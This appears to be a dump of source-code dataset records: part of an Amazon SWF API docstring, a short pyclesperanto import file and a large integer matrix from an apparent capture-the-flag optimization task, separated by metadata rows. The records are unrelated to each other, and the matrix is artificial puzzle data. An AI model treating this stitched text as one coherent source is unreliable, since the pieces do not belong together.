- **signalExternalWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``SignalExternalWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the external workflow execution that the signal was being delivered to.
- **runId** *(string) --*
The ``runId`` of the external workflow execution that the signal was being delivered to.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **initiatedEventId** *(integer) --*
The ID of the ``SignalExternalWorkflowExecutionInitiated`` event corresponding to the ``SignalExternalWorkflowExecution`` decision to request this signal. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``SignalExternalWorkflowExecution`` decision for this signal. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
The data attached to the event that the decider can use in subsequent workflow tasks. This data isn't sent to the workflow execution.
- **externalWorkflowExecutionCancelRequestedEventAttributes** *(dict) --*
If the event is of type ``ExternalWorkflowExecutionCancelRequested`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The external workflow execution to which the cancellation request was delivered.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **initiatedEventId** *(integer) --*
The ID of the ``RequestCancelExternalWorkflowExecutionInitiated`` event corresponding to the ``RequestCancelExternalWorkflowExecution`` decision to cancel this external workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **requestCancelExternalWorkflowExecutionInitiatedEventAttributes** *(dict) --*
If the event is of type ``RequestCancelExternalWorkflowExecutionInitiated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the external workflow execution to be canceled.
- **runId** *(string) --*
The ``runId`` of the external workflow execution to be canceled.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RequestCancelExternalWorkflowExecution`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent workflow tasks.
- **requestCancelExternalWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``RequestCancelExternalWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the external workflow to which the cancel request was to be delivered.
- **runId** *(string) --*
The ``runId`` of the external workflow execution.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **initiatedEventId** *(integer) --*
The ID of the ``RequestCancelExternalWorkflowExecutionInitiated`` event corresponding to the ``RequestCancelExternalWorkflowExecution`` decision to cancel this external workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RequestCancelExternalWorkflowExecution`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
The data attached to the event that the decider can use in subsequent workflow tasks. This data isn't sent to the workflow execution.
- **scheduleActivityTaskFailedEventAttributes** *(dict) --*
If the event is of type ``ScheduleActivityTaskFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **activityType** *(dict) --*
The activity type provided in the ``ScheduleActivityTask`` decision that failed.
- **name** *(string) --*
The name of this activity.
.. note::
The combination of activity type name and version must be unique within a domain.
- **version** *(string) --*
The version of this activity.
.. note::
The combination of activity type name and version must be unique with in a domain.
- **activityId** *(string) --*
The activityId provided in the ``ScheduleActivityTask`` decision that failed.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision that resulted in the scheduling of this activity task. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **requestCancelActivityTaskFailedEventAttributes** *(dict) --*
If the event is of type ``RequestCancelActivityTaskFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **activityId** *(string) --*
The activityId provided in the ``RequestCancelActivityTask`` decision that failed.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RequestCancelActivityTask`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startTimerFailedEventAttributes** *(dict) --*
If the event is of type ``StartTimerFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The timerId provided in the ``StartTimer`` decision that failed.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``StartTimer`` decision for this activity task. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **cancelTimerFailedEventAttributes** *(dict) --*
If the event is of type ``CancelTimerFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The timerId provided in the ``CancelTimer`` decision that failed.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CancelTimer`` decision to cancel this timer. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startChildWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``StartChildWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowType** *(dict) --*
The workflow type provided in the ``StartChildWorkflowExecution`` Decision that failed.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
When ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision fails because it lacks sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **workflowId** *(string) --*
The ``workflowId`` of the child workflow execution.
- **initiatedEventId** *(integer) --*
When the ``cause`` is ``WORKFLOW_ALREADY_RUNNING`` , ``initiatedEventId`` is the ID of the ``StartChildWorkflowExecutionInitiated`` event that corresponds to the ``StartChildWorkflowExecution`` Decision to start the workflow execution. You can use this information to diagnose problems by tracing back the chain of events leading up to this event.
When the ``cause`` isn't ``WORKFLOW_ALREADY_RUNNING`` , ``initiatedEventId`` is set to ``0`` because the ``StartChildWorkflowExecutionInitiated`` event doesn't exist.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``StartChildWorkflowExecution`` Decision to request this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events.
- **control** *(string) --*
The data attached to the event that the decider can use in subsequent workflow tasks. This data isn't sent to the child workflow execution.
- **lambdaFunctionScheduledEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionScheduled`` event. It isn't set for other event types.
- **id** *(string) --*
The unique ID of the Lambda task.
- **name** *(string) --*
The name of the Lambda function.
- **control** *(string) --*
Data attached to the event that the decider can use in subsequent workflow tasks. This data isn't sent to the Lambda task.
- **input** *(string) --*
The input provided to the Lambda task.
- **startToCloseTimeout** *(string) --*
The maximum amount of time a worker can take to process the Lambda task.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``LambdaFunctionCompleted`` event corresponding to the decision that resulted in scheduling this activity task. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **lambdaFunctionStartedEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionStarted`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this activity task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **lambdaFunctionCompletedEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionCompleted`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this Lambda task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``LambdaFunctionStarted`` event recorded when this activity task started. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **result** *(string) --*
The results of the Lambda task.
- **lambdaFunctionFailedEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionFailed`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this activity task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``LambdaFunctionStarted`` event recorded when this activity task started. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **reason** *(string) --*
The reason provided for the failure.
- **details** *(string) --*
The details of the failure.
- **lambdaFunctionTimedOutEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionTimedOut`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this activity task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event that was recorded when this activity task started. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **timeoutType** *(string) --*
The type of the timeout that caused this event.
- **scheduleLambdaFunctionFailedEventAttributes** *(dict) --*
Provides the details of the ``ScheduleLambdaFunctionFailed`` event. It isn't set for other event types.
- **id** *(string) --*
The ID provided in the ``ScheduleLambdaFunction`` decision that failed.
- **name** *(string) --*
The name of the Lambda function.
- **cause** *(string) --*
The cause of the failure. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``LambdaFunctionCompleted`` event corresponding to the decision that resulted in scheduling this Lambda task. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **startLambdaFunctionFailedEventAttributes** *(dict) --*
Provides the details of the ``StartLambdaFunctionFailed`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **cause** *(string) --*
The cause of the failure. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because the IAM role attached to the execution lacked sufficient permissions. For details and example IAM policies, see `Lambda Tasks <http://docs.aws.amazon.com/amazonswf/latest/developerguide/lambda-task.html>`__ in the *Amazon SWF Developer Guide* .
- **message** *(string) --*
A description that can help diagnose the cause of the fault.
- **previousStartedEventId** *(integer) --*
The ID of the DecisionTaskStarted event of the previous decision task of this workflow execution that was processed by the decider. This can be used to determine the events in the history new since the last decision task received by the decider.
- **NextToken** *(string) --*
A token to resume pagination.
:type domain: string
:param domain: **[REQUIRED]**
The name of the domain containing the task lists to poll.
:type taskList: dict
:param taskList: **[REQUIRED]**
Specifies the task list to poll for decision tasks.
The specified string must not start or end with whitespace. It must not contain a ``:`` (colon), ``/`` (slash), ``|`` (vertical bar), or any control characters (``\u0000-\u001f`` | ``\u007f-\u009f`` ). Also, it must not contain the literal string ``arn`` .
- **name** *(string) --* **[REQUIRED]**
The name of the task list.
:type identity: string
:param identity:
Identity of the decider making the request, which is recorded in the DecisionTaskStarted event in the workflow history. This enables diagnostic tracing when problems arise. The form of this identity is user defined.
:type reverseOrder: boolean
:param reverseOrder:
When set to ``true`` , returns the events in reverse order. By default the results are returned in ascending order of the ``eventTimestamp`` of the events.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
| 80.530745 | 1,596 | 0.573559 | 24,335 | 259,309 | 6.092418 | 0.028149 | 0.014097 | 0.007365 | 0.009578 | 0.976372 | 0.97387 | 0.971476 | 0.970417 | 0.968305 | 0.966559 | 0 | 0.004616 | 0.34757 | 259,309 | 3,219 | 1,597 | 80.555763 | 0.87089 | 0.895387 | 0 | 0.391304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.304348 | false | 0.304348 | 0.086957 | 0 | 0.695652 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 11 |
36c66cd59789fdee315c89fceb9a718186b5f703 | 138 | py | Python | pyclesperanto_prototype/_tier5/__init__.py | haesleinhuepf/pyclesperanto_prototype | 65bc3035d3b2b61a2722c93b95bae310bfbd190e | [
"BSD-3-Clause"
] | 1 | 2021-01-15T15:32:19.000Z | 2021-01-15T15:32:19.000Z | pyclesperanto_prototype/_tier5/__init__.py | haesleinhuepf/pyclesperanto_prototype | 65bc3035d3b2b61a2722c93b95bae310bfbd190e | [
"BSD-3-Clause"
] | null | null | null | pyclesperanto_prototype/_tier5/__init__.py | haesleinhuepf/pyclesperanto_prototype | 65bc3035d3b2b61a2722c93b95bae310bfbd190e | [
"BSD-3-Clause"
] | null | null | null | from ._connected_components_labeling_diamond import connected_components_labeling_diamond
from ._voronoi_labeling import voronoi_labeling
| 46 | 89 | 0.927536 | 16 | 138 | 7.375 | 0.4375 | 0.322034 | 0.457627 | 0.576271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057971 | 138 | 2 | 90 | 69 | 0.907692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
7fcec42a226444d7f6b6f060a6f3498ef90ce7a6 | 215,081 | py | Python | tasks/optimization/inverted_special.py | HackerDom/qctf-starter-2016 | 02fde33d0a9e7f107e787077b26e810de6b8e423 | [
"MIT"
] | 6 | 2016-12-08T17:35:46.000Z | 2019-12-05T07:17:26.000Z | tasks/optimization/inverted_special.py | HackerDom/qctf-starter-2016 | 02fde33d0a9e7f107e787077b26e810de6b8e423 | [
"MIT"
] | 1 | 2020-06-05T17:28:56.000Z | 2020-06-05T17:28:56.000Z | tasks/optimization/inverted_special.py | HackerDom/qctf-starter-2016 | 02fde33d0a9e7f107e787077b26e810de6b8e423 | [
"MIT"
] | 1 | 2017-01-12T17:53:52.000Z | 2017-01-12T17:53:52.000Z | MATRIX = [[25350, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 46080, 3328, 52032, 43216, 55476, 14861, 43054],
[13030, 57350, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 30720, 24064, 51072, 21984, 46200, 31326, 32201],
[61505, 40934, 23814, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 35840, 17152, 2240, 60464, 46220, 55107, 49216],
[61572, 1857, 3302, 55814, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 19456, 13056, 29888, 25392, 22860, 24515],
[27664, 22404, 7745, 31206, 22278, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 41984, 18688, 47680, 60560, 10148, 63561, 31810],
[2112, 13328, 48772, 13633, 59110, 54278, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 10240, 18944, 8832, 21664, 51752, 40010, 36973],
[16640, 55360, 64528, 9604, 19521, 21478, 20742, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 64512, 40704, 16320, 496, 18428, 29343, 47284],
